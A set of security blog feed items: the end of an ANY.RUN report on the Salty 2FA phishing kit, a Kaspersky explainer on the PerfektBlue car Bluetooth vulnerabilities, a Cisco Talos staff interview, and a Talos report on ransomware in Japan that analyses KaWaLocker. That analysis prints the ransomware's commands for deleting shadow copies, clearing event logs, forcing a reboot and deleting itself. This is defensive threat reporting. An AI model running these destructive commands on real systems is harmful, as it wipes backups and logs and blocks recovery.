Storm-1747, on the other hand, is well known for Tycoon 2FA—a state-of-the-art phishing kit that has ranked among the most active in terms of both attacks and related samples for several years. That said, Tycoon relies on a different infrastructure (mainly es-ru-es domain chains) and implements distinct client-side code, including its obfuscation and exfiltration techniques.
To track and assess this phishing activity, the framework was designated Salty 2FA, a name inspired by its “salted” payloads, which consistently helped distinguish its code from other kits during analysis. More importantly, a unique threat name was required, one easier to work with than YetAnotherPhishkitActivity2FA, and “Salty 2FA” struck the right balance of clarity and memorability.
Check potential overlaps between Salty 2FA and Storm-1575/1747
Analysis of phishing emails, their content themes, and pre-filled victim email addresses (automatically inserted via the #email anchor in URLs) made it possible to identify the targets of this campaign, including affected countries and industries.
Observed targets include:
| Country / Region of the Organization | Industry |
|---|---|
| USA / Worldwide (India) | Metallurgy |
| USA / LATAM | Financial |
| Greece | Telecom |
| Germany / Worldwide | Chemicals / Polymers |
| Spain | Energy (solar panels) |
| Spain | Energy |
| USA | Real estate development |
| Switzerland / Worldwide | Logistics |
| USA | Healthcare |
| USA | Financial |
| USA | IT consulting / Staffing |
| USA | Environmental services |
| Canada / France | IT |
| USA | Government |
| UK / Worldwide | Consulting / Financial |
| Italy | Industrial (packaging, automation) |
| UK | Construction / Infrastructure |
| USA / Worldwide | Logistics |
| USA / Worldwide | Logistics |
| USA | Oil and gas |
| USA | Financial / Insurance |
| UK | Real estate |
| USA | Chemicals / Packaging |
| USA | Consulting / Financial |
| USA | Data management / Storage |
| USA | Automotive accessories |
| USA | Construction / Contractors |
| USA | Education |
| USA | Financial |
Common phishing email lures included:
Additional IOCs extracted from SPF records in email headers:
Activity timeline:
Based on data from the ANY.RUN Sandbox and TI, activity resembling Salty 2FA began gaining momentum in June 2025, although it is possible that early or “raw” variants of the kit, or samples similar to it, were already being deployed as early as March–April 2025.
Confirmed activity attributed to Salty 2FA has been observed since late July 2025 and continues to this day, generating dozens of new public analysis sessions in the Sandbox every day.
Basic indicators such as domain names (hashes are not applicable here due to constant obfuscation and code mutation) can be useful for threat hunting and expanding the threat landscape. In some cases, they may even lead to detections. However, for phishing kits like Salty 2FA, these indicators are generally unreliable for long-term or consistent detection.
Threat detection specialists and engineers instead need to identify behavioral patterns that remain consistent across samples, even when those samples appear completely different at first glance.
Any recurring clue, whether it is a particular chain of TLD zones in domain names, distinctive URL structures, unusual web page headers, or a characteristic set of resources loaded from legitimate CDNs, contributes to the behavioral profile of a PhaaS framework. These recurring traits allow analysts to track and detect it over time without relying on volatile details such as email hashes or specific phishing domains.
With solutions like ANY.RUN‘s Interactive Sandbox, analysts can observe phishing kits in real time, uncover hidden behaviors, and distinguish between similar frameworks. By focusing on behavioral patterns rather than fragile indicators, it becomes possible to track evolving PhaaS activity more reliably, while also enjoying a smoother, less resource-heavy investigation process.
The ecosystem of Phishing-as-a-Service (PhaaS) platforms is constantly evolving. Existing kits adapt their attack methods, while new players emerge, some entirely brand-new, others reimagined versions of tools once used by well-known threat actors.
The analyzed framework, Salty 2FA, shares certain traits with Storm-1575, the group behind the Dadsec platform. However, a deeper examination revealed too many unique characteristics to reliably attribute it to any of the known threats, such as Tycoon2FA, Sneaky2FA, Mamba2FA, Gabagool, or EvilProxy.
With its ability to distribute phishing payloads at scale, maintain dynamic infrastructure, intercept and process most known 2FA authentication methods beyond simple credentials, and manage a complex communication model between phishing pages and C2 servers, Salty 2FA stands on par with the “major” kits in today’s phishing landscape.
For SOC teams triaging phishing-related incidents, it is critical to quickly and accurately confirm the malicious nature of collected artifacts and correlate them with the threat actor likely to be targeting their organization.
ANY.RUN’s Interactive Sandbox enables security professionals worldwide to detect and analyze threats like Salty 2FA by replicating victim interactions and tracking execution chains in real time, while leveraging behavior-based detection to expose previously unknown samples and indicators.
See how Salty 2FA and other emerging phishing kits unfold in real time. ANY.RUN’s Interactive Sandbox lets you safely detonate samples, follow execution chains, and uncover hidden IOCs in seconds.
Request 14-day trial for your SOC →
https://app.any.run/tasks/91e777dd-603b-47e4-ad8f-96e8bddf2cba
https://app.any.run/tasks/7d8e3a4d-5226-40b9-9e94-0f833c784abc
https://app.any.run/tasks/a601b5c4-c178-4a8e-b941-230636d11a1c
The post Salty 2FA: Undetected PhaaS from Storm-1575 Hitting US and EU Industries appeared first on ANY.RUN’s Cybersecurity Blog.
ANY.RUN’s Cybersecurity Blog – Read More
Cars these days are effectively computers on wheels — making them targets for cybercriminals: theft, unauthorized activation of on-board equipment, remote braking and steering, and spying on drivers and passengers are all perfectly doable by the bad guys. But carrying out such attacks often requires either physical access to the vehicle or remote access to its telematics systems (that is, hijacking communications with the carmaker’s server over the cellular network). However, a recent study by PCA Cyber Security describes a new hacking method that targets the car’s infotainment system via Bluetooth. The four vulnerabilities in question — collectively named PerfektBlue — are unlikely to lead to widespread car thefts or hacks, but it’s still worth knowing about them and exercising caution.
If your car was made within the last 10 years, no doubt it lets you connect your smartphone via Bluetooth to make hands-free calls or listen to music. The infotainment system is a part of the head unit, and it uses a built-in Bluetooth chip and special software to work. The software of choice for many carmakers is OpenSynergy Blue SDK. According to its developers, Blue SDK is used in 350 million vehicles made by Ford, Mercedes-Benz, Skoda, Volkswagen, and others.
PCA Cyber Security discovered four vulnerabilities in Blue SDK (CVE-2024-45431, CVE-2024-45432, CVE-2024-45433, CVE-2024-45434) which, when used together, could allow an attacker to run malicious code in the system. To do so, they’d need to be connected to the car via Bluetooth, which means pairing a device. If successful, the attacker can send malicious commands to the car using the Audio/Video Remote Control Profile (AVCRP) for Bluetooth. This causes an error in the head unit’s operating system, giving the hacker the same Bluetooth permissions as the carmaker’s software. Armed with these permissions, the attacker can theoretically track the vehicle’s location, eavesdrop through the car’s built-in microphones, as well as steal data from the head unit, such as the victim’s address book. Depending on the digital architecture of the car, the CAN bus for communication between electronic control units (ECUs) may get compromised — allowing an intruder to take over essential functions such as braking.
How to spot and prevent this attack? This depends on how Bluetooth is implemented in your particular vehicle. In some rare cases, the in-car infotainment system may not require any driver/passenger confirmation at all — leaving Bluetooth open to third-party connections. If so, there’s no way to stop an attack (!). Most cars however require the driver to confirm a connection to a new device, so a driver will see an unexpected connection request. If the request is denied, the attack will fail. The car may even automatically deny connection if the driver has not explicitly enabled pairing mode in the settings. If that applies to your car, attackers will have a job on their hands.
How to determine if your car is vulnerable? Unfortunately, makers tend not to disclose information about vehicle components — let alone the software inside them. Therefore, the only reliable way is to contact a branded dealer or specialized car service where they can check the head unit and advise on whether new firmware is available that eliminates the vulnerabilities. The researchers themselves experimented (and successfully exploited the vulnerabilities) on the head units of a Volkswagen ID.4 (infotainment system: MEB ICAS3), a Mercedes-Benz (NTG6) and a Skoda Superb (MIB3).
How to protect your car and yourself? The best advice is to update the head unit firmware to a patched version. Although OpenSynergy released software updates back in September 2024, these must first be applied by the manufacturer of the head unit, and only then by the carmaker. The latter must also distribute the new firmware across its dealer network. Therefore, some vulnerable cars may still be lacking new firmware.
The second reliable method of protection is to disable in-car Bluetooth.
What’s the attack range? With standard Bluetooth hardware, the attack range is limited to 10 meters, but special amplifiers (range extenders) can extend this to 50–100 meters. If a vehicle is equipped with 4G cellular network technology, then after the first phase of the attack, which requires Bluetooth, threat actors can theoretically maintain control over the car via the cellular network.
Is it true the engine must be on for the attack to work? This limitation was reported by Volkswagen, but in practice almost all cars allow you to turn on the infotainment system together with Bluetooth while the ignition is off. Therefore, a running engine is not an attack precondition.
What should carmakers do to improve protection against such attacks? Car manufacturers should adopt the Secure by Design approach. Kaspersky, together with manufacturers of head units and automotive electronics, is creating a line of Cyber Immune solutions based on KasperskyOS that keep the system protected and running even if a vulnerable component is attacked. But given the long development and testing cycles in the automotive industry, it will be several more years before Cyber Immune cars hit the roads.
More case studies of car hacking through vulnerabilities in electronic systems:
Kaspersky official blog – Read More
Welcome to the second episode of Humans of Talos, our ongoing video interview series that celebrates the people powering Cisco’s threat intelligence efforts. In each episode, we dive deep into the personal journeys, motivations and lessons learned from the team members who help keep the internet safe. This episode, let’s meet JJ Cummings, who leads our Threat Intelligence and Interdiction team, focusing on nation-state security and intelligence. Read (or watch) on for JJ’s story, his thoughts on burnout and motivation, and advice for anyone looking to join Talos.
Amy Ciminnisi: Hello and welcome to the second episode of Humans of Talos. I’m here with JJ Cummings today, who leads a team on our Threat Intelligence and Interdiction team, focused on nation state security and intelligence matters. What led you to your role at Talos?
JJ Cummings: Prior to Talos’ formal formation, or creation, I was a part of the Sourcefire acquisition, and I was a part of Sourcefire for many years. We helped with deep investigations and analysis and incident response and threat hunting. Then that moved into the Cisco world when Cisco acquired us. We determined that there was kind of the need for a Threat Intelligence team. There was an opportunity for me to come over to start to build out the capabilities and the path forward with Matt Olney, Ryan Pentney and several others. From there, the Threat Intelligence and Interdiction team grew to what it is today.
AC: What is something about your day to day role at Talos that people might be particularly surprised by or interested in?
JC: One of the challenges when we’re working with a lot of different partners is how we control the information. Some partners tell us, “Hey, we want feedback, but you can’t tell anybody else,” which is really difficult. We take that information and we try to identify our own ways to point to how we identified it so it doesn’t burn that partner. We have to find ways to highlight things in unattributable or alternatively attributable ways. But the good news is that I’ve got an amazing team behind me. They’re force multipliers and they are beasts when it comes to getting the job done.
Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos!
Cisco Talos Blog – Read More
Figure 1 summarizes the ransomware incidents involving Japanese domestic companies, including overseas branches and subsidiaries, from January 1 to June 30, 2025. According to the Cisco Talos investigation, there were 68 ransomware cases affecting organizations in Japan during this period. Sources include Cisco telemetry, official statements from affected companies, news reports and data from ransomware leak sites. Compared to 48 cases during the same period last year, this represents an approximately 1.4-fold increase. The number of incidents per month ranged from a minimum of 4 to a maximum of 16, with an average of about 11 ransomware attacks per month.
The industries affected remain largely unchanged from the same period last year, with the manufacturing sector experiencing the highest number of incidents at 18.2%, followed by the automotive sector with 5 cases (5.7%), and trading companies, construction and transportation each reporting 4 cases (4.6%).
Regarding the size of the affected organizations, those with capital of less than 100 million yen (or ¥) accounted for the largest share at 38%, followed by those with capital from ¥100 million – 1 billion at 31%. In total, organizations with capital under ¥1 billion made up 69% of all cases, indicating that attackers continue to primarily target small and medium-sized enterprises (see Figure 3).
LockBit and 8base, which were among the most frequently observed ransomware groups in Japan during the first half of FY2024, ceased their activities following takedown operations by law enforcement in February 2024 and February 2025 respectively, as publicly announced in press releases. As a result, neither group has been observed in 2025.
RansomHub and Hunters International, which ranked among the top ransomware groups last year, are confirmed to still be active in Japan. Notably, the ransomware group Qilin, which had not been reported to have caused any damage in Japan in FY2024, emerged as the most active group in the first half of FY2025, with eight confirmed victim organizations in the country. Qilin has been active since October 2022 and is one of the ransomware groups exerting significant influence both domestically and internationally. The findings from this investigation further suggest that Qilin’s activity is intensifying, making it one of the most critical groups to watch.
Following Qilin, three groups — Lynx, Nightspire, and RansomHub — accounted for three incidents each. Regarding RansomHub, attacks targeting Japan were also confirmed around the same time in 2024. Groups such as Akira, Cicada3301, Gunra, Kawa4096 and Space Bears were each responsible for two incidents. In particular, Kawa4096, which began operations in late June 2025, has targeted Japan from the outset, warranting special attention.
Other groups with one confirmed incident each include Black Suit, CLOP, Devman, Fog and Play, among others.
Trustwave published a useful analysis report on Kawa4096 in July 2025.
The ransomware group first posted about a victim organization on its leak site, shown in Figure 5, on June 19, 2025. Subsequently, it disclosed information believed to pertain to attacks on two Japanese companies on June 26 and June 28.
The ransomware used by this group, shown in Figure 6, utilizes the FindResourceW API to load a configuration file from the resource section, as illustrated in Figure 7. The configuration file defines items such as file extensions, directories and specific folders to exclude from encryption; processes and services to terminate; and commands to execute. In the example configuration file shown in the figure, the command to be executed via WMI is defined as <cmd_post value=”calc”>, which causes the calculator to launch. Since it only launches the calculator after encryption, it is likely being used to check whether the configuration has been correctly applied. Depending on the value set, arbitrary commands can be executed. In other configuration files, Talos has also confirmed cases where a forced reboot is triggered after encryption using the command shutdown /r /t 0.
The file extension added after encryption is also determined by a value loaded from the resource section, just like the configuration file. Specifically, the ransomware sets the extension using the data starting 8 bytes from the loaded value, and uses the following 9 bytes as the new extension.
Once the extension name for the encrypted files is determined, an icon file used after encryption is created at the following path using the CreateFileW API:
C:UsersPublicDocuments.C3680868C.ico
After that, a new key named “.C3680868C” is created under “HKEY_LOCAL_MACHINESoftwareClasses” in the registry, with a subkey DefaultIcon whose value is set to the path of the icon mentioned above.
This ransomware checks for the presence of the “all” argument upon execution. (Figure 12)
Below is a summary of the three arguments:
When the -all option is not specified, the ransomware re-executes itself as “%ws” -all using the CreateProcessW API. Additionally, only when -all is not specified, the ransomware creates a Mutex named “SAY_HI_2025” using the CreateMutexA API to check whether it is already running.
A ransom note named “!!Restore-My-file-Kavva.txt,” as shown in Figure 13, is created in C: and in each encrypted folder. The ransom note primarily states that the system has been encrypted and that important data has been stolen — characteristics typical of double-extortion ransomware. It warns that if communication is refused, the data will be published. It also specifies the types of data involved, such as employees’ personal information and customer information, making it clear that the attackers are urging the victim to initiate contact with them.
After file encryption, the following commands are executed to prevent recovery by deleting backup-related data and traces, such as event logs.
vssadmin.exe Delete Shadows /all /quiet vssadmin.exe delete shadows /all /quiet wmic shadowcopy delete /nointeractive cmd.exe /c wevtutil cl security | wevtutil cl system | wevtutil cl application
Depending on the configuration settings, the program may also delete itself.
cmd.exe /C ping 127.0.0.1 -n 2 > nul && del /F
Regarding the encryption method, the chunk size is determined based on the size of the target file, and the number of chunks is decided accordingly. For files smaller than or equal to 10MB, the data is not split for encryption. However, for files larger than 10MB, the file is divided based on varying chunk sizes according to file size, as shown in Figure 15. The base chunk size is defined by the value at offset (a1 + 488), which is set to 0x10000 (64KB). Figure 16 shows the chunk sizes corresponding to different file sizes. This implementation improves encryption performance by accelerating the processing of files.
Once the chunk count is determined, the target data is encrypted using the Salsa20 stream cipher.
We also observed KaWaLocker 2.0 in late July 2025. This indicates that the attackers may become even more active in deploying this malware in the future. One of the main changes is that the ransom note differs from the initial version of KaWaLocker. As shown in Figure 17, the ransom note for KaWaLocker 2.0 includes a newly added email contact.
Another change is that when examining the configuration of KaWaLocker 2.0, we found that a flag called “hide_name” had been added.
When this flag is enabled, the file name is changed and encrypted based on the absolute file path using a hash function.
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
ClamAV detections are also available for this threat:
The IOCs can also be found in our GitHub repository here.
Cisco Talos Blog – Read More